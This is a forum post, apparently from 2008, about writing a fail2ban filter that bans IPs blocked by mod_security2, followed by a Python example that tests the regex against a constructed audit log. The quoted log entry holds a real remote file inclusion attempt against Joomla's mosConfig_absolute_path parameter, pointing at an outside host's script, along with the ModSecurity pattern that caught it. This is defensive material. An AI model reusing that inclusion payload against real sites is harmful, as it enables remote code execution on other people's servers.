I tried it like this:
Created in filter.d: apache-modsec.conf
Code:
[Definition]
# Option: failregex
# Notes.: regex to match the password failure messages in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching.
# Values: TEXT
#
failregex = [[]client <HOST>[]] Message: Access denied with code 403
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
in jail.conf:
Code:
[apache-modsec]
enabled = true
port = http
filter = apache-modsec
logpath = /var/log/apache*/mod-security2.log
maxretry = 1
I use modsecurity2, which logs to /var/log/apache*/mod-security2.log.
Is the above correct for this log, i.e. does it work this way?
The attacker's IP is on the first line, immediately followed by that of my server.
The log entries look like this:
Code:
--e97c4236-A--
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80
--e97c4236-B--
GET /content/view/20/38//?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.tld.tld
User-Agent: libwww-perl/5.808
--e97c4236-F--
HTTP/1.1 403 Forbidden
Last-Modified:
ETag: "119xxxxxxxxxxx56540"
Accept-Ranges: bytes
Content-Length: 1136
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1
--e97c4236-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
--e97c4236-Z--
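To see what fail2ban would actually extract from this audit log, the following added example (not from the post) replays its line-by-line matching: the posted failregex is run against a constructed mod_security2 audit entry modelled on the one above, alongside an alternative regex anchored on the "A" section line where the client IP appears. The `<HOST>` expansion is the pattern fail2ban 0.8 used and is taken as an assumption here; the IP addresses and hostnames in the sample are constructed.

```python
import re

# fail2ban replaces <HOST> with a named group before compiling a failregex.
# Assumption: this is the expansion used by fail2ban 0.8.
HOST_PATTERN = r"(?:::f{4,6}:)?(?P<host>[\w\-.^_]+)"

# The failregex exactly as posted in apache-modsec.conf. The "[client x.x.x.x]"
# prefix is the Apache error_log format, not the audit log format.
POSTED_FAILREGEX = r"[[]client <HOST>[]] Message: Access denied with code 403"

# Alternative (constructed suggestion): match the audit log "A" section line,
# whose third field is the client IP. Only works if the audit log contains
# nothing but relevant (intercepted) transactions.
AUDIT_A_FAILREGEX = r"^\[[^\]]+\] \S+ <HOST> \d+ \S+ \d+$"

# Constructed audit entry modelled on the one in the post (addresses invented).
SAMPLE_AUDIT_LOG = """\
--e97c4236-A--
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX 198.51.100.23 33139 203.0.113.10 80
--e97c4236-B--
GET /index.php HTTP/1.1
Host: www.example.invalid
--e97c4236-F--
HTTP/1.1 403 Forbidden
--e97c4236-H--
Message: Access denied with code 403 (phase 2). Pattern match "..." at ARGS:x.
Action: Intercepted (phase 2)
--e97c4236-Z--
"""


def compile_failregex(failregex):
    """Expand <HOST> the way fail2ban does and compile the result."""
    return re.compile(failregex.replace("<HOST>", HOST_PATTERN))


def match_hosts(failregex, log_text):
    """Return the hosts fail2ban would extract, scanning one line at a time.

    fail2ban never joins lines, so the IP in the "A" line and the "Message:"
    text in the "H" line can never be matched by one regex together.
    """
    rx = compile_failregex(failregex)
    hosts = []
    for line in log_text.splitlines():
        m = rx.search(line)
        if m:
            hosts.append(m.group("host"))
    return hosts


if __name__ == "__main__":
    print("posted failregex:", match_hosts(POSTED_FAILREGEX, SAMPLE_AUDIT_LOG))
    print("A-line failregex:", match_hosts(AUDIT_A_FAILREGEX, SAMPLE_AUDIT_LOG))
```

With SecAuditEngine set to RelevantOnly the audit log holds only transactions that triggered a rule or a relevant status, so the "A" line is a usable anchor; with SecAuditEngine On, every request would be counted as a failure.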